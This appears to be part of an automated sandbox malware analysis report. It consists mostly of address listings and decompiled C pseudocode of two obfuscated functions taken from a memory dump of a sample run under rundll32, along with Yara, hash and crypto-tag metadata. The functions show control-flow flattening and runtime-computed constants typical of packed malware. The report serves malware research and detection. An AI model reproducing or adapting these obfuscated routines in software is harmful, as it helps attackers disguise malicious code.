                                                                                                                      0x00189244
                                                                                                                      0x0018924c
                                                                                                                      0x00189251
                                                                                                                      0x00189256
                                                                                                                      0x0018925e
                                                                                                                      0x00189266
                                                                                                                      0x0018926e
                                                                                                                      0x00189273
                                                                                                                      0x00189278
                                                                                                                      0x00189280
                                                                                                                      0x00189288
                                                                                                                      0x0018928d
                                                                                                                      0x00189295
                                                                                                                      0x0018929d
                                                                                                                      0x001892a8
                                                                                                                      0x001892b0
                                                                                                                      0x001892bb
                                                                                                                      0x001892c3
                                                                                                                      0x001892cc
                                                                                                                      0x001892cf
                                                                                                                      0x001892d3
                                                                                                                      0x001892d8
                                                                                                                      0x001892e0
                                                                                                                      0x001892ed
                                                                                                                      0x001892f1
                                                                                                                      0x001892f9
                                                                                                                      0x00189301
                                                                                                                      0x00189309
                                                                                                                      0x00189311
                                                                                                                      0x00189319
                                                                                                                      0x00189321
                                                                                                                      0x00189329
                                                                                                                      0x00189333
                                                                                                                      0x00189337
                                                                                                                      0x0018933f
                                                                                                                      0x0018934c
                                                                                                                      0x00189357
                                                                                                                      0x00189362
                                                                                                                      0x0018936d
                                                                                                                      0x00189375
                                                                                                                      0x00189380
                                                                                                                      0x0018938b
                                                                                                                      0x00189396
                                                                                                                      0x001893a1
                                                                                                                      0x001893a9
                                                                                                                      0x001893ae
                                                                                                                      0x001893b6
                                                                                                                      0x001893bb
                                                                                                                      0x001893c3
                                                                                                                      0x001893cb
                                                                                                                      0x001893cf
                                                                                                                      0x001893d7
                                                                                                                      0x001893df
                                                                                                                      0x001893e7
                                                                                                                      0x001893f2
                                                                                                                      0x001893f7
                                                                                                                      0x001893fd
                                                                                                                      0x00189405
                                                                                                                      0x00189412
                                                                                                                      0x00189415
                                                                                                                      0x00189419
                                                                                                                      0x0018941e
                                                                                                                      0x00189426
                                                                                                                      0x0018942e
                                                                                                                      0x00189436
                                                                                                                      0x0018943b
                                                                                                                      0x00189440
                                                                                                                      0x00189448
                                                                                                                      0x00189450
                                                                                                                      0x00189458
                                                                                                                      0x00189460
                                                                                                                      0x00189468
                                                                                                                      0x00189470
                                                                                                                      0x00189478
                                                                                                                      0x0018947d
                                                                                                                      0x00189485
                                                                                                                      0x0018948d
                                                                                                                      0x00189495
                                                                                                                      0x001894a0
                                                                                                                      0x001894ab
                                                                                                                      0x001894b6
                                                                                                                      0x001894be
                                                                                                                      0x001894c3
                                                                                                                      0x001894cb
                                                                                                                      0x001894d3
                                                                                                                      0x001894e1
                                                                                                                      0x001894e2
                                                                                                                      0x001894e8
                                                                                                                      0x001894f0
                                                                                                                      0x001894f8
                                                                                                                      0x00189505
                                                                                                                      0x00189509
                                                                                                                      0x0018950e
                                                                                                                      0x00189516
                                                                                                                      0x0018951e
                                                                                                                      0x00189526
                                                                                                                      0x0018952e
                                                                                                                      0x00189538
                                                                                                                      0x00189544
                                                                                                                      0x00189549
                                                                                                                      0x0018954f
                                                                                                                      0x0018955c
                                                                                                                      0x00189566
                                                                                                                      0x0018956e
                                                                                                                      0x00189576
                                                                                                                      0x0018957e
                                                                                                                      0x00189586
                                                                                                                      0x0018958b
                                                                                                                      0x00189593
                                                                                                                      0x0018959b
                                                                                                                      0x001895a3
                                                                                                                      0x001895a8
                                                                                                                      0x001895b0
                                                                                                                      0x001895b8
                                                                                                                      0x001895c5
                                                                                                                      0x001895c6
                                                                                                                      0x001895ca
                                                                                                                      0x001895d2
                                                                                                                      0x001895dd
                                                                                                                      0x001895e8
                                                                                                                      0x001895f3
                                                                                                                      0x001895fb
                                                                                                                      0x00189606
                                                                                                                      0x0018960a
                                                                                                                      0x00189612
                                                                                                                      0x0018961a
                                                                                                                      0x00189622
                                                                                                                      0x0018962a
                                                                                                                      0x0018962e
                                                                                                                      0x00189636
                                                                                                                      0x00189641
                                                                                                                      0x0018964c
                                                                                                                      0x00189657
                                                                                                                      0x0018965f
                                                                                                                      0x00189667
                                                                                                                      0x0018966f
                                                                                                                      0x00000000
                                                                                                                      0x00189677
                                                                                                                      0x00189685
                                                                                                                      0x00189748
                                                                                                                      0x0018974c
                                                                                                                      0x0018975b
                                                                                                                      0x00189760
                                                                                                                      0x0018976e
                                                                                                                      0x00189789
                                                                                                                      0x001897a7
                                                                                                                      0x001897c5
                                                                                                                      0x001897dd
                                                                                                                      0x001897e2
                                                                                                                      0x00189741
                                                                                                                      0x00189741
                                                                                                                      0x00000000
                                                                                                                      0x00189741
                                                                                                                      0x00189691
                                                                                                                      0x001896a8
                                                                                                                      0x001896ac
                                                                                                                      0x001896b8
                                                                                                                      0x001896bd
                                                                                                                      0x001896ce
                                                                                                                      0x001896d8
                                                                                                                      0x001896ed
                                                                                                                      0x0018971f
                                                                                                                      0x00189721
                                                                                                                      0x00189739
                                                                                                                      0x0018973e
                                                                                                                      0x00000000
                                                                                                                      0x0018973e
                                                                                                                      0x00189695
                                                                                                                      0x0018981f
                                                                                                                      0x00189823
                                                                                                                      0x0018982a
                                                                                                                      0x0018982e
                                                                                                                      0x0018982f
                                                                                                                      0x00189830
                                                                                                                      0x0018983b
                                                                                                                      0x0018983c
                                                                                                                      0x0018984f
                                                                                                                      0x00189851
                                                                                                                      0x0018969b
                                                                                                                      0x001896a1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001896a3
                                                                                                                      0x001896a1
                                                                                                                      0x00189860
                                                                                                                      0x00189860
                                                                                                                      0x001897ea
                                                                                                                      0x00189810
                                                                                                                      0x00189815
                                                                                                                      0x00189818
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: c$:Y($Qd$}Z$~4/$u
                                                                                                                      • API String ID: 0-1069939785
                                                                                                                      • Opcode ID: 3ff4209ff2e6c574366dc63adf6fab65c7ecd216403d93c311d74d7387cbf1a2
                                                                                                                      • Instruction ID: 1d2a4e1bd915da457d206a12f3797b96c0a008f252f032c57da11acf64866d0b
                                                                                                                      • Opcode Fuzzy Hash: 3ff4209ff2e6c574366dc63adf6fab65c7ecd216403d93c311d74d7387cbf1a2
                                                                                                                      • Instruction Fuzzy Hash: 86F101725083809FD369DF21C94AA9BBBF2FBC5748F10891DF19A96220D7B58509CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00172830 Relevance: 7.8, Strings: 6, Instructions: 270COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00172830() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				unsigned int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				void* _t307;
				void* _t311;
				void* _t312;
				void* _t314;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				intOrPtr _t332;
				intOrPtr _t334;
				intOrPtr _t354;
				void* _t361;
				signed int* _t365;

				_t365 =  &_v1168;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0xd27b82;
				_v1132 = 0xd68ad;
				_t317 = 0x39;
				_t361 = 0x31951cf;
				_v1132 = _v1132 / _t317;
				_v1132 = _v1132 | 0x7a114e95;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 ^ 0x003f4f84;
				_v1164 = 0x8948b3;
				_v1164 = _v1164 + 0x5689;
				_v1164 = _v1164 + 0xffffbb3a;
				_t318 = 0x19;
				_v1164 = _v1164 * 0x56;
				_v1164 = _v1164 ^ 0x2e2b97d6;
				_v1072 = 0xcb9c2b;
				_v1072 = _v1072 >> 3;
				_v1072 = _v1072 ^ 0x001ca36a;
				_v1080 = 0x1dbdae;
				_v1080 = _v1080 >> 8;
				_v1080 = _v1080 ^ 0x00014686;
				_v1156 = 0xb5510a;
				_v1156 = _v1156 / _t318;
				_v1156 = _v1156 ^ 0xc10914df;
				_v1156 = _v1156 | 0x9ca0ebe9;
				_v1156 = _v1156 ^ 0xdda118ad;
				_v1104 = 0x66b826;
				_v1104 = _v1104 ^ 0xe9987981;
				_v1104 = _v1104 * 0x25;
				_v1104 = _v1104 ^ 0xd1d8b52b;
				_v1056 = 0xa9a3d5;
				_v1056 = _v1056 * 0x6e;
				_v1056 = _v1056 ^ 0x48e0209e;
				_v1064 = 0xff8e1d;
				_v1064 = _v1064 + 0x7d6c;
				_v1064 = _v1064 ^ 0x0102ce02;
				_v1060 = 0x1cd25;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x00092955;
				_v1112 = 0x2e454b;
				_v1112 = _v1112 ^ 0xdfc484a9;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 ^ 0xfea80718;
				_v1084 = 0x44c343;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0x99776358;
				_v1084 = _v1084 ^ 0x804f0a92;
				_v1148 = 0xd43471;
				_v1148 = _v1148 << 0x10;
				_v1148 = _v1148 ^ 0xf30ce1ba;
				_v1148 = _v1148 | 0x5684f5e4;
				_v1148 = _v1148 ^ 0xd7f82c28;
				_v1140 = 0xc6d087;
				_v1140 = _v1140 * 0xf;
				_v1140 = _v1140 / _t318;
				_t319 = 0x11;
				_v1140 = _v1140 / _t319;
				_v1140 = _v1140 ^ 0x000f807a;
				_v1076 = 0xeb33ff;
				_v1076 = _v1076 | 0x3caa7413;
				_v1076 = _v1076 ^ 0x3ce1a50e;
				_v1160 = 0xf6df2e;
				_v1160 = _v1160 << 3;
				_t320 = 0x12;
				_v1160 = _v1160 / _t320;
				_t321 = 0x23;
				_v1160 = _v1160 / _t321;
				_v1160 = _v1160 ^ 0x0001c97f;
				_v1096 = 0x2990f1;
				_v1096 = _v1096 + 0x8b3d;
				_v1096 = _v1096 << 4;
				_v1096 = _v1096 ^ 0x02a87cfa;
				_v1168 = 0x9204f1;
				_v1168 = _v1168 << 2;
				_v1168 = _v1168 >> 0xe;
				_v1168 = _v1168 ^ 0x6a27e144;
				_v1168 = _v1168 ^ 0x6a24f645;
				_v1068 = 0x63146e;
				_v1068 = _v1068 + 0xffffb906;
				_v1068 = _v1068 ^ 0x00673218;
				_v1124 = 0xa7a9d5;
				_v1124 = _v1124 * 0x43;
				_v1124 = _v1124 + 0xa631;
				_v1124 = _v1124 ^ 0x2beabd88;
				_v1144 = 0x5bd0aa;
				_v1144 = _v1144 * 6;
				_v1144 = _v1144 | 0x1ea27ebc;
				_v1144 = _v1144 + 0xffff7d79;
				_v1144 = _v1144 ^ 0x1eab8d23;
				_v1152 = 0x75499f;
				_v1152 = _v1152 >> 7;
				_v1152 = _v1152 * 0x3b;
				_v1152 = _v1152 * 0x36;
				_v1152 = _v1152 ^ 0x0b6e0547;
				_v1116 = 0xfc11ad;
				_v1116 = _v1116 ^ 0xa8b58fc5;
				_v1116 = _v1116 * 0x46;
				_v1116 = _v1116 ^ 0x042cd8c8;
				_v1088 = 0x98b2ad;
				_v1088 = _v1088 + 0x5f8d;
				_v1088 = _v1088 << 8;
				_v1088 = _v1088 ^ 0x99161df3;
				_v1108 = 0xc44bb5;
				_v1108 = _v1108 + 0xffff808c;
				_v1108 = _v1108 ^ 0x7a0d028c;
				_v1108 = _v1108 ^ 0x7ac2537a;
				_v1128 = 0x834e58;
				_v1128 = _v1128 + 0xffff18d5;
				_v1128 = _v1128 << 0xe;
				_v1128 = _v1128 + 0xe46a;
				_v1128 = _v1128 ^ 0x99c7b134;
				_v1136 = 0xd0608e;
				_v1136 = _v1136 << 0xd;
				_v1136 = _v1136 ^ 0x0f37e4e4;
				_v1136 = _v1136 ^ 0x0bc0752d;
				_v1136 = _v1136 ^ 0x08ebd133;
				_v1120 = 0xe37477;
				_v1120 = _v1120 << 0xf;
				_v1120 = _v1120 << 0x10;
				_v1120 = _v1120 ^ 0x800d4304;
				_v1092 = 0xa7d287;
				_v1092 = _v1092 * 0x3e;
				_v1092 = _v1092 << 0xb;
				_v1092 = _v1092 ^ 0x27ebbc9f;
				_v1100 = 0xbdc4ed;
				_v1100 = _v1100 << 8;
				_t322 = 0x37;
				_v1100 = _v1100 / _t322;
				_v1100 = _v1100 ^ 0x03761b38;
				_t307 = E0019074A();
				do {
					while(_t361 != 0x31951cf) {
						if(_t361 == 0x3cad130) {
							_push( &_v1040);
							_push( &_v520);
							_push(_v1100);
							return E00178D95(_v1120, _v1092, __eflags);
						}
						if(_t361 == 0xac73e1e) {
							_push(_v1068);
							_push(_v1168);
							_push(0x17113c);
							_t311 = E0017AB66(_v1160, _v1096, __eflags);
							_t312 = E00175AE2(_v1124);
							_t354 =  *0x19520c; // 0x0
							_t266 = _t354 + 0x220; // 0x220
							_t268 = _t354 + 8; // 0x8
							E0018D37B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
							_t307 = E0017AE03(_v1108, _v1128, _v1136, _t311);
							_t365 =  &(_t365[0xd]);
							_t361 = 0x3cad130;
							continue;
						}
						_t373 = _t361 - 0xc947a3e;
						if(_t361 != 0xc947a3e) {
							goto L8;
						}
						_push(_v1104);
						_push(_v1156);
						_push(0x1710cc);
						_t314 = E0017AB66(_v1072, _v1080, _t373);
						_t332 =  *0x19520c; // 0x0
						_t334 =  *0x19520c; // 0x0
						E0017E7CE(_t314, _t373, _v1056, _t334 + 8, _t332 + 0x220, _v1064, _v1060, _v1112, _v1084, _t332 + 0x220);
						_t307 = E0017AE03(_v1148, _v1140, _v1076, _t314);
						_t365 =  &(_t365[0xd]);
						_t361 = 0xac73e1e;
					}
					_t361 = 0xc947a3e;
					L8:
					__eflags = _t361 - 0x9b97ca4;
				} while (__eflags != 0);
				return _t307;
			}




















































                                                                                                                      0x00172830
                                                                                                                      0x00172836
                                                                                                                      0x0017283d
                                                                                                                      0x00172842
                                                                                                                      0x0017284a
                                                                                                                      0x0017285c
                                                                                                                      0x00172861
                                                                                                                      0x00172866
                                                                                                                      0x0017286a
                                                                                                                      0x00172872
                                                                                                                      0x00172877
                                                                                                                      0x0017287f
                                                                                                                      0x00172887
                                                                                                                      0x0017288f
                                                                                                                      0x0017289e
                                                                                                                      0x001728a1
                                                                                                                      0x001728a5
                                                                                                                      0x001728ad
                                                                                                                      0x001728b5
                                                                                                                      0x001728ba
                                                                                                                      0x001728c2
                                                                                                                      0x001728ca
                                                                                                                      0x001728cf
                                                                                                                      0x001728d7
                                                                                                                      0x001728e7
                                                                                                                      0x001728eb
                                                                                                                      0x001728f3
                                                                                                                      0x001728fb
                                                                                                                      0x00172903
                                                                                                                      0x0017290b
                                                                                                                      0x00172918
                                                                                                                      0x0017291c
                                                                                                                      0x00172924
                                                                                                                      0x00172937
                                                                                                                      0x0017293e
                                                                                                                      0x00172949
                                                                                                                      0x00172951
                                                                                                                      0x00172959
                                                                                                                      0x00172961
                                                                                                                      0x0017296c
                                                                                                                      0x00172974
                                                                                                                      0x0017297f
                                                                                                                      0x00172987
                                                                                                                      0x0017298f
                                                                                                                      0x00172994
                                                                                                                      0x0017299c
                                                                                                                      0x001729a9
                                                                                                                      0x001729ad
                                                                                                                      0x001729b5
                                                                                                                      0x001729bd
                                                                                                                      0x001729c5
                                                                                                                      0x001729ca
                                                                                                                      0x001729d2
                                                                                                                      0x001729da
                                                                                                                      0x001729e2
                                                                                                                      0x001729ef
                                                                                                                      0x001729fb
                                                                                                                      0x00172a03
                                                                                                                      0x00172a06
                                                                                                                      0x00172a0c
                                                                                                                      0x00172a14
                                                                                                                      0x00172a1c
                                                                                                                      0x00172a24
                                                                                                                      0x00172a2c
                                                                                                                      0x00172a34
                                                                                                                      0x00172a3f
                                                                                                                      0x00172a44
                                                                                                                      0x00172a4e
                                                                                                                      0x00172a51
                                                                                                                      0x00172a55
                                                                                                                      0x00172a5d
                                                                                                                      0x00172a65
                                                                                                                      0x00172a6d
                                                                                                                      0x00172a72
                                                                                                                      0x00172a7a
                                                                                                                      0x00172a82
                                                                                                                      0x00172a87
                                                                                                                      0x00172a8c
                                                                                                                      0x00172a94
                                                                                                                      0x00172a9c
                                                                                                                      0x00172aa4
                                                                                                                      0x00172aac
                                                                                                                      0x00172ab4
                                                                                                                      0x00172ac1
                                                                                                                      0x00172ac5
                                                                                                                      0x00172acd
                                                                                                                      0x00172ad5
                                                                                                                      0x00172ae2
                                                                                                                      0x00172ae6
                                                                                                                      0x00172aee
                                                                                                                      0x00172af6
                                                                                                                      0x00172afe
                                                                                                                      0x00172b06
                                                                                                                      0x00172b10
                                                                                                                      0x00172b19
                                                                                                                      0x00172b1d
                                                                                                                      0x00172b25
                                                                                                                      0x00172b2d
                                                                                                                      0x00172b3a
                                                                                                                      0x00172b3e
                                                                                                                      0x00172b46
                                                                                                                      0x00172b4e
                                                                                                                      0x00172b56
                                                                                                                      0x00172b5b
                                                                                                                      0x00172b63
                                                                                                                      0x00172b6b
                                                                                                                      0x00172b73
                                                                                                                      0x00172b7b
                                                                                                                      0x00172b83
                                                                                                                      0x00172b8b
                                                                                                                      0x00172b93
                                                                                                                      0x00172b98
                                                                                                                      0x00172ba0
                                                                                                                      0x00172ba8
                                                                                                                      0x00172bb0
                                                                                                                      0x00172bb5
                                                                                                                      0x00172bbd
                                                                                                                      0x00172bc5
                                                                                                                      0x00172bcd
                                                                                                                      0x00172bd5
                                                                                                                      0x00172bda
                                                                                                                      0x00172bdf
                                                                                                                      0x00172be7
                                                                                                                      0x00172bf4
                                                                                                                      0x00172bf8
                                                                                                                      0x00172bfd
                                                                                                                      0x00172c07
                                                                                                                      0x00172c0f
                                                                                                                      0x00172c1a
                                                                                                                      0x00172c1d
                                                                                                                      0x00172c21
                                                                                                                      0x00172c31
                                                                                                                      0x00172c45
                                                                                                                      0x00172c45
                                                                                                                      0x00172c53
                                                                                                                      0x00172d77
                                                                                                                      0x00172d7f
                                                                                                                      0x00172d80
                                                                                                                      0x00000000
                                                                                                                      0x00172d91
                                                                                                                      0x00172c5b
                                                                                                                      0x00172cea
                                                                                                                      0x00172cee
                                                                                                                      0x00172cfa
                                                                                                                      0x00172cff
                                                                                                                      0x00172d0d
                                                                                                                      0x00172d16
                                                                                                                      0x00172d1c
                                                                                                                      0x00172d2b
                                                                                                                      0x00172d3f
                                                                                                                      0x00172d51
                                                                                                                      0x00172d56
                                                                                                                      0x00172d59
                                                                                                                      0x00000000
                                                                                                                      0x00172d59
                                                                                                                      0x00172c61
                                                                                                                      0x00172c63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00172c69
                                                                                                                      0x00172c6d
                                                                                                                      0x00172c79
                                                                                                                      0x00172c7e
                                                                                                                      0x00172c83
                                                                                                                      0x00172cae
                                                                                                                      0x00172cc6
                                                                                                                      0x00172cdb
                                                                                                                      0x00172ce0
                                                                                                                      0x00172ce3
                                                                                                                      0x00172ce3
                                                                                                                      0x00172d60
                                                                                                                      0x00172d62
                                                                                                                      0x00172d62
                                                                                                                      0x00172d62
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: 78d63a4a5fe61b853d42ca7dbe84bde96b670821f03b31cd212a77c47b765099
                                                                                                                      • Instruction ID: 6ecfa3ba8ac9d7eefb754981c181d8738903df20fbce0e1c78311317d9130429
                                                                                                                      • Opcode Fuzzy Hash: 78d63a4a5fe61b853d42ca7dbe84bde96b670821f03b31cd212a77c47b765099
                                                                                                                      • Instruction Fuzzy Hash: 43D11FB15083809FC368CF65C58A51BFBF1FBD4748F508A1DF2AA96260D7B58949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018129C Relevance: 7.8, Strings: 6, Instructions: 266COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0018129C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				intOrPtr _v20;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t225;
				signed int _t257;
				signed int* _t258;
				void* _t260;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int* _t305;
				void* _t308;

				_t302 = _a8;
				_t258 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0017CF25(_t225);
				_v20 = 0x578391;
				_t305 =  &(( &_v164)[4]);
				asm("stosd");
				_t260 = 0x3e847b6;
				asm("stosd");
				asm("stosd");
				_v136 = 0x7901e7;
				_v136 = _v136 ^ 0x0e05b978;
				_v136 = _v136 | 0x8500df2f;
				_v136 = _v136 ^ 0x8f7cffbf;
				_v72 = 0x5c6105;
				_v72 = _v72 ^ 0xba418fb0;
				_v72 = _v72 ^ 0xba16afcf;
				_v156 = 0xc57f64;
				_v156 = _v156 << 0xe;
				_v156 = _v156 | 0xac310e4c;
				_t295 = 0x48;
				_v156 = _v156 / _t295;
				_v156 = _v156 ^ 0x038a2108;
				_v100 = 0xf9dfe5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x0009d912;
				_v112 = 0xb5688b;
				_t296 = 0x3d;
				_v112 = _v112 / _t296;
				_v112 = _v112 ^ 0x00064c77;
				_v116 = 0x80f1cc;
				_v116 = _v116 + 0xfffff23f;
				_v116 = _v116 ^ 0x008ab174;
				_v92 = 0xc78857;
				_v92 = _v92 | 0x5f9c477c;
				_v92 = _v92 ^ 0x5fdf5dba;
				_v148 = 0x3d8773;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 | 0x15c33ced;
				_v148 = _v148 + 0xffff6977;
				_v148 = _v148 ^ 0x15c9e03a;
				_v140 = 0x8050fd;
				_v140 = _v140 + 0xffffb165;
				_v140 = _v140 ^ 0xb13fe806;
				_v140 = _v140 ^ 0xb1b5a353;
				_v104 = 0x3fa35;
				_v104 = _v104 ^ 0x0635ab8b;
				_v104 = _v104 ^ 0x0638ddfb;
				_v128 = 0x6276d2;
				_v128 = _v128 * 0x67;
				_v128 = _v128 >> 7;
				_v128 = _v128 ^ 0x004624e6;
				_v84 = 0xb2127e;
				_v84 = _v84 ^ 0xdd4df2db;
				_v84 = _v84 ^ 0xddf0f9d7;
				_v108 = 0x825106;
				_v108 = _v108 + 0x54ee;
				_v108 = _v108 ^ 0x00831379;
				_v96 = 0x675ffa;
				_v96 = _v96 + 0xffff86b7;
				_v96 = _v96 ^ 0x0064c66c;
				_v132 = 0x78c111;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 + 0xffff7c58;
				_v132 = _v132 ^ 0xfff3b3ba;
				_v164 = 0xbe0848;
				_t297 = 0x46;
				_v164 = _v164 / _t297;
				_v164 = _v164 << 4;
				_v164 = _v164 >> 5;
				_v164 = _v164 ^ 0x00009249;
				_v152 = 0xd46630;
				_v152 = _v152 | 0x25786146;
				_v152 = _v152 << 6;
				_t298 = 0x4f;
				_v152 = _v152 / _t298;
				_v152 = _v152 ^ 0x0191f926;
				_v144 = 0xf6674c;
				_v144 = _v144 >> 6;
				_v144 = _v144 ^ 0xb535724d;
				_v144 = _v144 ^ 0xb53e6a0f;
				_v160 = 0x2a1e3b;
				_v160 = _v160 >> 5;
				_t299 = 0x76;
				_v160 = _v160 / _t299;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x00046312;
				_v120 = 0xf44552;
				_v120 = _v120 + 0xbd95;
				_v120 = _v120 ^ 0x00f02cb9;
				_v76 = 0x9a2b11;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x2684a730;
				_v80 = 0x6aeef9;
				_t300 = 0x51;
				_v80 = _v80 / _t300;
				_v80 = _v80 ^ 0x000c464e;
				_v124 = 0x84a5f5;
				_v124 = _v124 << 5;
				_v124 = _v124 + 0xddfe;
				_v124 = _v124 ^ 0x10975fd7;
				_v88 = 0xa441a9;
				_v88 = _v88 + 0x5567;
				_v88 = _v88 ^ 0x00aef9b7;
				goto L1;
				do {
					while(1) {
						L1:
						_t308 = _t260 - 0x8801db7;
						if(_t308 > 0) {
							break;
						}
						if(_t308 == 0) {
							E0018F88F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
						} else {
							if(_t260 == 0x235eed) {
								E00184D91( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
								_t305 =  &(_t305[2]);
								_t260 = 0x85d9450;
								continue;
							} else {
								if(_t260 == 0x3e847b6) {
									_t260 = 0xab5e479;
									 *_t258 =  *_t258 & 0x00000000;
									_t258[1] = _v136;
									continue;
								} else {
									if(_t260 == 0x6ea21eb) {
										E00184D91( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
										_t305 =  &(_t305[2]);
										_t260 = 0x9265c01;
										continue;
									} else {
										if(_t260 == 0x80db57c) {
											E00184D91( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
											_t305 =  &(_t305[2]);
											_t260 = 0x8801db7;
											continue;
										} else {
											if(_t260 != 0x85d9450) {
												goto L24;
											} else {
												E00184D91( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
												_t305 =  &(_t305[2]);
												_t260 = 0x80db57c;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t258;
						_t224 =  *_t258 != 0;
						__eflags = _t224;
						return 0 | _t224;
					}
					__eflags = _t260 - 0x9265c01;
					if(_t260 == 0x9265c01) {
						E00184D91( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
						_t305 =  &(_t305[2]);
						_t260 = 0x235eed;
						goto L24;
					} else {
						__eflags = _t260 - 0xa20e3fb;
						if(__eflags == 0) {
							E0018F88F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
							_t305 =  &(_t305[3]);
							_t260 = 0x6ea21eb;
							goto L1;
						} else {
							__eflags = _t260 - 0xab5e479;
							if(_t260 == 0xab5e479) {
								_t258[1] = E0019146E(_t302);
								_t260 = 0xffaf556;
								goto L1;
							} else {
								__eflags = _t260 - 0xf4853c6;
								if(_t260 == 0xf4853c6) {
									E001864C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
									_t305 =  &(_t305[4]);
									_t260 = 0xa20e3fb;
									goto L1;
								} else {
									__eflags = _t260 - 0xffaf556;
									if(_t260 != 0xffaf556) {
										goto L24;
									} else {
										_push(_t260);
										_push(_t260);
										_t257 = E00183512(_t258[1]);
										 *_t258 = _t257;
										__eflags = _t257;
										if(__eflags != 0) {
											_t260 = 0xf4853c6;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t260 - 0x1d5478a;
				} while (__eflags != 0);
				goto L27;
			}










































                                                                                                                      0x001812a5
                                                                                                                      0x001812ac
                                                                                                                      0x001812af
                                                                                                                      0x001812b0
                                                                                                                      0x001812b8
                                                                                                                      0x001812b9
                                                                                                                      0x001812be
                                                                                                                      0x001812d2
                                                                                                                      0x001812d5
                                                                                                                      0x001812d8
                                                                                                                      0x001812df
                                                                                                                      0x001812e0
                                                                                                                      0x001812e1
                                                                                                                      0x001812e9
                                                                                                                      0x001812f1
                                                                                                                      0x001812f9
                                                                                                                      0x00181301
                                                                                                                      0x00181309
                                                                                                                      0x00181311
                                                                                                                      0x00181319
                                                                                                                      0x00181321
                                                                                                                      0x00181326
                                                                                                                      0x00181332
                                                                                                                      0x00181337
                                                                                                                      0x0018133d
                                                                                                                      0x00181345
                                                                                                                      0x0018134d
                                                                                                                      0x00181352
                                                                                                                      0x0018135a
                                                                                                                      0x00181366
                                                                                                                      0x00181369
                                                                                                                      0x0018136d
                                                                                                                      0x00181375
                                                                                                                      0x0018137d
